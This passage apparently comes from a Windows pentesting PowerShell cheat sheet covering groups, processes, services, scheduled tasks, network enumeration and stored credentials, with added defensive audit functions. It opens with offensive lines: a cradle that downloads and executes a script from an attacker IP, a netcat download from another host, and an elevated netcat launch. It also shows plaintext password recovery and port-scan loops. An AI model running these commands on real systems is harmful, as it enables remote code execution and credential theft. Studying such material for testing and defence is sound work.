Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"

#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
#Launch an elevated process under the same credential object built above ($cred, not an undefined variable)
Start-Process powershell -Credential $cred -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'

#Another method: build the credential and target first, then hand them to the launcher of your choice
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
```
Groups
Groups are the main way to organise and control user access on a Windows system. Through groups you assign permissions and restrictions to users and their devices, which is central to keeping the system secure.
Built-in Groups
Windows ships with many built-in groups, each with a fixed name and role. Some of them:
- Administrators: full administrative rights over the system. Members can make any change, including managing other users' accounts.
- Users: ordinary users. They have no administrative rights and can only change their own accounts.
- Guests: temporary or unknown users. They have no administrative rights and only limited access to the system.
- Power Users: more rights than ordinary users, but not the full administrative rights of the Administrators group.
- Backup Operators: permitted to back up and restore data on the system.
- Remote Desktop Users: permitted to log on to the system remotely through Remote Desktop.
Custom Groups
Besides the built-in groups you can create your own, with the names and permissions you choose, and add users to them to control their access to system resources.
Managing Groups
Managing groups means creating, editing and deleting them and adding or removing members. That is how you control user access to the system and keep it secure.
```powershell
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
```
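The two commands above list group members; what a reviewer usually wants next is to know which Administrators members are unexpected. The following is an added example, not code from the original page: it tags each member of the local Administrators group as expected or not. The baseline list passed in `-Expected` (here only `Domain Admins`) is an assumption to adapt to your own environment; the built-in Administrator is recognised by its RID 500.

```powershell
# Added example: audit local Administrators membership against a baseline.
# Assumptions: the baseline below is illustrative; RID 500 is the built-in Administrator.
function Get-UnexpectedAdmin {
    param(
        [string[]]$Expected = @('Domain Admins')   # assumed baseline, adjust per environment
    )
    Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
        $sid = $_.SID.Value
        $isBuiltinAdmin = $sid -like 'S-1-5-21-*-500'   # RID 500 = built-in local Administrator
        $shortName = $_.Name.Split('\')[-1]              # strip the DOMAIN\ or HOST\ prefix
        [pscustomobject]@{
            Name            = $_.Name
            SID             = $sid
            ObjectClass     = $_.ObjectClass             # User or Group
            PrincipalSource = $_.PrincipalSource         # Local, ActiveDirectory, MicrosoftAccount
            Unexpected      = -not ($isBuiltinAdmin -or ($Expected -contains $shortName))
        }
    }
}

# Show only the members that are not on the baseline
Get-UnexpectedAdmin | Where-Object Unexpected | Format-Table Name, SID, ObjectClass, PrincipalSource -AutoSize
```

Run it from an elevated shell on each host and diff the output over time; a new direct user in Administrators (rather than membership through a domain group) is the classic change worth an alert.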
Clipboard
The clipboard is a temporary storage area in memory where data cut or copied from one place is held until it is pasted somewhere else. It is commonly used to move text, images and other data between applications or within the same application.
In PowerShell the clipboard is read and written with the Get-Clipboard and Set-Clipboard cmdlets: the first returns the current contents, the second replaces them with new data.
Getting the Clipboard Contents
Get-Clipboard returns whatever is currently on the clipboard:
```powershell
$clipboardContents = Get-Clipboard
```
Setting the Clipboard Contents
Set-Clipboard replaces the current contents with the data you supply:
```powershell
Set-Clipboard -Value "New clipboard data"
```
The pipeline works as well; piping a command's output into Set-Clipboard copies that output to the clipboard:
```powershell
Get-Process | Set-Clipboard
```
Clearing the Clipboard
Windows PowerShell ships no Clear-Clipboard cmdlet; the usual way to empty the clipboard from a script is to pipe empty output into clip.exe:
```powershell
cmd /c "echo off | clip"
```
Conclusion
Knowing how to work with the clipboard from PowerShell helps when automating copy-and-paste tasks. It also matters for security: the clipboard often holds the last thing a user copied, including credentials, which is why it is worth clearing after use.
```powershell
Get-Clipboard
```
Processes
Listing Processes
List the processes running on a Windows system with:
```powershell
Get-Process
```
Listing a Process by Name
To list a process by name, use:
```powershell
Get-Process -Name <process_name>
```
Listing a Process by Process ID
To list a process by its process ID, use:
```powershell
Get-Process -Id <process_id>
```
Listing Processes with Their Owning User
The -IncludeUserName parameter belongs to Get-Process (not Stop-Process) and needs an elevated shell:
```powershell
Get-Process -IncludeUserName | ft Name, Id, UserName
```
Killing a Process
Kill a process with:
```powershell
Stop-Process -Id <process_id>
```
Killing a Process by Name
To kill a process by name, use:
```powershell
Stop-Process -Name <process_name>
```
Killing Without Confirmation, Waiting and Logging
Stop-Process has no -Wait or -Timeout parameters; waiting is the job of Wait-Process. -Force suppresses the confirmation prompt shown for processes owned by other users, and -PassThru returns the process objects so they can be waited on and written to a file:
```powershell
$killed = Stop-Process -Name <process_name> -Force -PassThru
$killed | Wait-Process -Timeout <seconds>
$killed | Out-File <file_name>
```
Filter out the many svchost hosts to see the processes worth looking at:
```powershell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
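Get-Process shows names and IDs, but not who owns a process, who started it or where its binary lives. The following is an added example, not code from the original page: it builds that inventory from Win32_Process and flags executables running from user-writable locations. The directory list in `$suspectRoots` is an assumption to extend for your estate.

```powershell
# Added example: process inventory with owner, parent and executable path.
# Assumption: the roots below are the user-writable locations to flag; adjust as needed.
function Get-ProcessInventory {
    $suspectRoots = @("$env:SystemDrive\Users\", "$env:SystemRoot\Temp\", "$env:ProgramData\")
    $procs = Get-CimInstance -ClassName Win32_Process
    $byId  = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }   # index for parent lookup
    foreach ($p in $procs) {
        # GetOwner returns Domain/User for the process token (ReturnValue 0 on success)
        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner
        $ownerName = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { '<n/a>' }
        $parent = $byId[[int]$p.ParentProcessId]
        $path = $p.ExecutablePath
        $suspect = $false
        if ($path) {
            foreach ($root in $suspectRoots) {
                if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $suspect = $true }
            }
        }
        [pscustomobject]@{
            PID              = $p.ProcessId
            Name             = $p.Name
            Owner            = $ownerName
            ParentPID        = $p.ParentProcessId
            ParentName       = if ($parent) { $parent.Name } else { '<exited>' }
            Path             = $path
            UserWritablePath = $suspect
        }
    }
}

# Processes whose binary lives where an unprivileged user can write
Get-ProcessInventory | Where-Object UserWritablePath | Format-Table PID, Name, Owner, ParentName, Path -AutoSize
```

Run elevated so that ExecutablePath and GetOwner resolve for processes of other users; an unelevated shell returns blanks for those.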
Services
Introduction
In this section you will find information about the different services present in a Windows environment. Knowing them matters to a pentester, since services can be potential entry points for exploitation.
Common Windows Services
- Active Directory
- Active Directory Certificate Services
- Active Directory Federation Services
- Active Directory Lightweight Directory Services
- Active Directory Rights Management Services
- Application Host Helper Service
- Application Information
- Application Layer Gateway Service
- Application Management
- ASP.NET State Service
- Background Intelligent Transfer Service
- Base Filtering Engine
- BitLocker Drive Encryption Service
- Block Level Backup Engine Service
- Bluetooth Support Service
- BranchCache
- Certificate Propagation
- CNG Key Isolation
- COM+ Event System
- COM+ System Application
- Computer Browser
- Credential Manager
- Cryptographic Services
- Data Sharing Service
- DCOM Server Process Launcher
- Desktop Window Manager Session Manager
- DHCP Client
- DHCP Server
- Diagnostic Policy Service
- Diagnostic Service Host
- Diagnostic System Host
- Distributed Link Tracking Client
- Distributed Transaction Coordinator
- DNS Client
- DNS Server
- Encrypting File System
- Event Log
- Extensible Authentication Protocol
- Fax
- File History Service
- Function Discovery Provider Host
- Function Discovery Resource Publication
- Group Policy Client
- Health Key and Certificate Management
- HomeGroup Listener
- HomeGroup Provider
- Human Interface Device Access
- IKE and AuthIP IPsec Keying Modules
- Interactive Services Detection
- Internet Connection Sharing (ICS)
- IP Helper
- IPsec Policy Agent
- KtmRm for Distributed Transaction Coordinator
- Link-Layer Topology Discovery Mapper
- Media Center Extender Service
- Microsoft iSCSI Initiator Service
- Microsoft Software Shadow Copy Provider
- Multimedia Class Scheduler
- Netlogon
- Network Access Protection Agent
- Network Connections
- Network Connectivity Assistant
- Network List Service
- Network Location Awareness
- Network Store Interface Service
- Offline Files
- Parental Controls
- Peer Name Resolution Protocol
- Peer Networking Grouping
- Peer Networking Identity Manager
- Performance Counter DLL Host
- Performance Logs & Alerts
- Plug and Play
- PNRP Machine Name Publication Service
- PNRP Machine Name Resolution Service
- Portable Device Enumerator Service
- Power
- Print Spooler
- Problem Reports and Solutions Control Panel Support
- Program Compatibility Assistant Service
- Quality Windows Audio Video Experience
- Remote Access Auto Connection Manager
- Remote Access Connection Manager
- Remote Desktop Configuration
- Remote Desktop Services
- Remote Desktop Services UserMode Port Redirector
- Remote Procedure Call (RPC)
- Remote Procedure Call (RPC) Locator
- Remote Registry
- Routing and Remote Access
- Secondary Logon
- Secure Socket Tunneling Protocol Service
- Security Accounts Manager
- Security Center
- Server
- Shell Hardware Detection
- Simple TCP/IP Services
- Smart Card
- Smart Card Removal Policy
- SNMP Trap
- Software Protection
- SPP Notification Service
- SSDP Discovery
- Storage Service
- Superfetch
- System Event Notification Service
- Task Scheduler
- TCP/IP NetBIOS Helper
- Telephony
- Themes
- Thread Ordering Server
- TPM Base Services
- UPnP Device Host
- User Profile Service
- Virtual Disk
- Volume Shadow Copy
- WebClient
- Windows Audio
- Windows Audio Endpoint Builder
- Windows Backup
- Windows Biometric Service
- Windows CardSpace
- Windows Color System
- Windows Connect Now - Config Registrar
- Windows Defender Advanced Threat Protection
- Windows Defender Antivirus Network Inspection Service
- Windows Defender Antivirus Service
- Windows Defender Firewall
- Windows Defender Firewall Authorization Driver
- Windows Defender Firewall with Advanced Security
- Windows Deployment Services
- Windows Driver Foundation - User-mode Driver Framework
- Windows Error Reporting Service
- Windows Event Collector
- Windows Event Log
- Windows Firewall
- Windows Font Cache Service
- Windows Image Acquisition (WIA)
- Windows Installer
- Windows License Manager Service
- Windows Management Instrumentation
- Windows Media Player Network Sharing Service
- Windows Modules Installer
- Windows Presentation Foundation Font Cache 3.0.0.0
- Windows Push Notifications System Service
- Windows Remote Management (WS-Management)
- Windows Search
- Windows Time
- Windows Update
- WinHTTP Web Proxy Auto-Discovery Service
- Wired AutoConfig
- WLAN AutoConfig
- WMI Performance Adapter
- Workstation
- WWAN AutoConfig
Conclusion
Understanding the services in a Windows environment is essential for a pentester. By familiarising yourself with them you can identify potential vulnerabilities and exploit them effectively.
```powershell
Get-Service
```
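Get-Service reports name and state only. The following is an added example, not code from the original page: it reads Win32_Service to show, for each service, the binary it runs, the account it runs as and its start mode, and flags binaries living outside %SystemRoot%, which is where third-party and hand-installed services show up. The path parsing handles both quoted and unquoted command lines.

```powershell
# Added example: service inventory from Win32_Service.
# Assumption: "outside %SystemRoot%" is the heuristic used to surface non-Windows services.
function Get-ServiceInventory {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $cmd = $_.PathName
        $exe = $null
        if ($cmd) {
            if ($cmd.StartsWith('"')) {
                $exe = $cmd.Split('"')[1]          # quoted: the executable is between the first quotes
            } else {
                # unquoted: take everything up to the first ".exe", else the first token
                $m = [regex]::Match($cmd, '^(.*?\.exe)', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)
                $exe = if ($m.Success) { $m.Groups[1].Value } else { $cmd.Split(' ')[0] }
            }
        }
        $outside = [bool]($exe -and -not $exe.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase))
        [pscustomobject]@{
            Name           = $_.Name
            DisplayName    = $_.DisplayName
            State          = $_.State
            StartMode      = $_.StartMode       # Auto, Manual, Disabled
            RunAs          = $_.StartName       # LocalSystem, NT AUTHORITY\..., or a named account
            Executable     = $exe
            OutsideWindows = $outside
        }
    }
}

# Non-Windows services, grouped by the account they run under
Get-ServiceInventory | Where-Object OutsideWindows | Sort-Object RunAs | Format-Table Name, State, StartMode, RunAs, Executable -AutoSize
```

A service running as LocalSystem from a vendor directory is normal; one running as a named domain account is worth checking, because that account's password is stored by the Service Control Manager and its rights extend wherever the account is used.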
Password from a secure string
ConvertFrom-SecureString does not reveal a password: it turns a SecureString into an encrypted standard string (a DPAPI blob unless -Key is given) that can safely be written to disk. Used this way it stores a password for later use:
```powershell
$secureString = Read-Host -AsSecureString
$encrypted = ConvertFrom-SecureString $secureString
$encrypted
```
Read-Host -AsSecureString takes the password without echoing it, ConvertFrom-SecureString encrypts it, and the encrypted string is displayed. Without -Key the blob can only be decrypted on the same machine by the same user account that produced it.
To get the plaintext back, load the encrypted string into a SecureString again and read it through a PSCredential, here from a value saved in a file:
```powershell
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
```
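The recovery above works whenever the decrypting context matches the encrypting one. The following is an added example, not code from the original page: it encrypts the same sample password both ways (DPAPI, then with an explicit -Key), recovers it through a PSCredential in both cases, and shows how to tell the two blob formats apart in a file found on disk. The password and the 32-byte key are constructed sample values; the key is deliberately weak and for illustration only.

```powershell
# Added example: DPAPI-protected versus key-protected SecureString blobs (Windows PowerShell).
# Assumptions: sample password and key are constructed; the DPAPI header constant is the
# hex of the provider GUID that every DPAPI blob starts with.
$plain  = 'S3cret-Sample!'                                   # constructed sample password
$secure = ConvertTo-SecureString $plain -AsPlainText -Force

# 1. DPAPI-protected: decrypts only for the same user on the same host
$dpapiBlob = ConvertFrom-SecureString $secure
$fromDpapi = ConvertTo-SecureString $dpapiBlob               # succeeds here, fails for another user/host

# 2. Key-protected: decrypts anywhere the key is available, so a key stored next to the
#    blob (or embedded in the script) makes the blob plaintext-equivalent
$key     = [byte[]](1..32)                                    # constructed weak key, illustration only
$keyBlob = ConvertFrom-SecureString $secure -Key $key
$fromKey = ConvertTo-SecureString $keyBlob -Key $key

# Recover the plaintext via PSCredential in both cases, the same way the page does
foreach ($s in @($fromDpapi, $fromKey)) {
    $cred = New-Object System.Management.Automation.PSCredential('sample', $s)
    $cred.GetNetworkCredential().Password
}

# Telling the formats apart: a DPAPI blob is hex and opens with the DPAPI header,
# a -Key blob uses a different prefix and carries the AES output after it
$dpapiHeader = '01000000d08c9ddf0115d1118c7a00c04fc297eb'
[pscustomobject]@{
    DpapiBlobHasHeader = $dpapiBlob.StartsWith($dpapiHeader)
    KeyBlobHasHeader   = $keyBlob.StartsWith($dpapiHeader)
}
```

The header check is a quick triage rule for credential files found during a review: a blob with the DPAPI header is useless off the originating host, while a -Key blob is only as safe as wherever the key is kept.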
Scheduled Tasks
Scheduled tasks are a powerful Windows feature that automates running scripts, programs or commands at set times or intervals. For a pentester, understanding how scheduled tasks work is useful for privilege escalation, persistence and lateral movement.
Viewing Scheduled Tasks
The schtasks command-line tool lists the scheduled tasks on a Windows system and can also query, create, modify and delete them.
To view all scheduled tasks, open a command prompt and run:
```powershell
schtasks /query /fo table
```
Creating Scheduled Tasks
To create a new scheduled task, use schtasks with the /create option. Administrative privileges are needed to create a task.
Example: create a task that runs a PowerShell script every day at 9:00 AM:
```powershell
schtasks /create /tn "MyTask" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1" /sc daily /st 09:00
```
Modifying Scheduled Tasks
To modify an existing task, use schtasks with the /change option. Again, administrative privileges are required. Note that /change cannot switch the schedule type (/sc); to make a daily task run every hour, give it a repetition interval and duration, or delete and recreate it.
Example: make an existing task repeat every hour for the 24 hours following each start:
```powershell
schtasks /change /tn "MyTask" /ri 60 /du 24:00
```
Deleting Scheduled Tasks
To delete a scheduled task, use schtasks with the /delete option. Once more, administrative privileges are required.
Example: delete a scheduled task:
```powershell
schtasks /delete /tn "MyTask" /f
```
Remember to replace "MyTask" with the actual name of the task you want to delete.
List the tasks that are not Microsoft's own:
```powershell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
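The one-liner above tells you which non-Microsoft tasks exist, not what they run or as whom. The following is an added example, not code from the original page: it expands each task into one row per action with the executable, its arguments, the principal, the run level and the last run time, then filters to tasks that run elevated or as SYSTEM. It uses only the ScheduledTasks module cmdlets and the properties of the MSFT_ScheduledTask objects they return.

```powershell
# Added example: inventory of non-Microsoft scheduled tasks, one row per action.
# Assumption: tasks under \Microsoft\ are treated as platform tasks and skipped, as the page does.
function Get-TaskInventory {
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' } | ForEach-Object {
        $task = $_
        $info = $task | Get-ScheduledTaskInfo          # LastRunTime, LastTaskResult, NextRunTime
        foreach ($action in $task.Actions) {
            [pscustomobject]@{
                TaskName   = $task.TaskName
                TaskPath   = $task.TaskPath
                State      = $task.State
                Author     = $task.Author
                RunAs      = $task.Principal.UserId    # SYSTEM, a user, or a group for interactive tasks
                RunLevel   = $task.Principal.RunLevel  # Limited or Highest (elevated)
                Execute    = $action.Execute            # empty for COM-handler actions
                Arguments  = $action.Arguments
                LastRun    = $info.LastRunTime
                LastResult = $info.LastTaskResult
            }
        }
    }
}

# Tasks that run with the highest privileges or as SYSTEM deserve a second look
Get-TaskInventory |
    Where-Object { $_.RunLevel -eq 'Highest' -or $_.RunAs -match 'SYSTEM' } |
    Format-Table TaskName, RunAs, RunLevel, Execute, Arguments, LastRun -AutoSize
```

Compare Execute against the service and application paths you expect; a task whose executable sits in a user profile or a temp directory, or whose Arguments contain an encoded command, is the pattern to investigate first.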
Port Scan
Port scanning is the process of identifying open ports on a computer or network device, usually with a dedicated scanner such as Nmap.
A scan gives the tester useful information: which ports are open, which services listen on them and sometimes the version of the software behind them. That information serves several purposes, including identifying security weaknesses and carrying out attacks.
For example, a scan may reveal an open SSH port on a host. That becomes dangerous if the SSH service on that host has a vulnerability, since the tester can then try to exploit it.
System owners and security staff should therefore scan their own systems regularly, to find and fix weaknesses before an attack happens.
```powershell
# Check Port or Single IP
Test-NetConnection -Port 80 10.10.10.10
# Check Port List in Single IP
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
# Check Port Range in single IP
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
# Check Port List in IP Lists - 80,443,445,8080
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
```
Interfaces
An interface is a way for a program to talk to the operating system or to another program. In PowerShell there are two kinds: command interfaces and object interfaces.
Command Interfaces
Command interfaces are the way PowerShell commands are run. They can behave like ordinary PowerShell commands or like operating-system commands, and are invoked through Invoke-Expression or by placing the call operator (&) before the command.
Object Interfaces
Object interfaces give access to the properties and methods of an object. They act on things such as files, directories and other operating-system objects, and are used by putting a dot (.) after the object name followed by the property or method name.
Finding Interfaces
There are several ways to discover interfaces in PowerShell:
- Listing the available commands: Get-Command returns every command available on your system.
- Reading a command's documentation: Get-Help returns the description and usage examples of a given command.
- Inspecting an object: Get-Member lists an object's properties and methods.
Using Interfaces
Using interfaces in PowerShell is straightforward. Command interfaces run PowerShell or operating-system commands; object interfaces act on particular objects, for example reading or writing a file.
For example, the command interface runs Get-Process to list the processes on your system, and the object interface reads a file's properties such as its name, size or modification date.
Conclusion
Interfaces are a core part of PowerShell and help you work effectively with the operating system. Learning to use them lets you work more efficiently and reach your goals in network penetration testing.
The host's network interfaces and DNS servers are listed with:
```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
Firewall
Firewalls are an essential component of network security. They sit between a trusted internal network and an untrusted external network and filter incoming and outgoing traffic against predefined rules. Firewalls exist both as hardware appliances and as software.
```powershell
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow

# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow

# Get name, protocol, local and remote ports, remote address, profile and direction
## You can use the following line, changing the initial filters to indicate a different direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
```
Route
route is a command-line utility, usable from PowerShell, that shows and modifies the operating system's routing table. It reports the existing routes and lets the user add, change or remove them.
The general syntax is:
```powershell
route [-f] [-p] [Command]
```
The parts of the command:
- -f: clears all existing routes.
- -p: makes the change persistent across reboots.
- Command: the routing command to run.
For example, the following prints the existing routes:
```powershell
route print
```
The following adds a route:
```powershell
route add [Destination] [Mask] [Gateway]
```
For example, this adds a route to 192.168.1.0 with mask 255.255.255.0 through the gateway 192.168.0.1:
```powershell
route add 192.168.1.0 mask 255.255.255.0 192.168.0.1
```
The following removes a route:
```powershell
route delete [Destination]
```
For example, this removes the route for 192.168.1.0:
```powershell
route delete 192.168.1.0
```
route matters to pentesters because it can change routes and send traffic along unexpected paths.
```powershell
route print
```
ARP
ARP (Address Resolution Protocol) is the network protocol that maps IP addresses to MAC (Media Access Control) addresses. It lets devices on a network learn each other's MAC addresses so they can communicate directly.
In a pentesting context ARP comes up in several ways, such as:
- ARP spoofing: deceiving other devices on the network by altering the MAC addresses associated with IP addresses.
- ARP cache poisoning: inserting incorrect MAC addresses into a device's ARP cache to interfere with communication between devices.
- ARP redirect: redirecting traffic on the network by changing the MAC addresses associated with IP addresses.
Understanding how ARP works and how it can be abused helps pentesters sharpen their skills and find weaknesses in a network.
```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
Hosts
```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
Ping
ping is a basic network command used to check connectivity between a computer and another network device. It uses ICMP (Internet Control Message Protocol) to send echo packets to the other device and receive replies. It serves several purposes: checking network availability, measuring round-trip time, or discovering which devices are present on a network.
Usually ping takes the IP address of the other device as its parameter. For example, `ping 192.168.1.1` sends packets to the device at 192.168.1.1 and waits for replies; the replies show whether the device was reached.
Ping is also used in security reconnaissance. For example, it can reveal network devices that do not appear on the list of registered devices, which may indicate unauthorised or unknown devices on the network.
ping is available on most operating systems, including Windows, Linux and macOS.
```powershell
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```
SNMP
SNMP (Simple Network Management Protocol) is a network protocol for managing network devices. It lets operators monitor and control devices remotely, using data models called MIBs (Management Information Bases).
There are three kinds of SNMP message:
- GetRequest: retrieves information from a network device.
- SetRequest: changes or sets configuration on a network device.
- Trap: sent by the network device to the management system when a particular event occurs.
SNMP controls access to devices with security settings such as community strings. Pentesters should therefore examine the security settings configured on network devices to identify any weakness that could be used to their advantage.
```powershell
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
Converting the SDDL String into a Readable Format
To convert an SDDL string into a readable form, use the ConvertFrom-SddlString cmdlet, which turns a Security Descriptor Definition Language (SDDL) string into an object that is easy to inspect.
```powershell
$sddlString = "SDDL_STRING_HERE"
$securityDescriptor = ConvertFrom-SddlString -Sddl $sddlString
$securityDescriptor
```
Replace SDDL_STRING_HERE with the SDDL string you want to convert. After the code runs, the console shows the converted security descriptor object, a far more readable rendering of the SDDL string.
Converting SDDL into a readable form makes the permissions and access-control settings attached to an object or resource easier to understand, which helps when analysing security configurations and troubleshooting access problems.
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-008
0c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb9
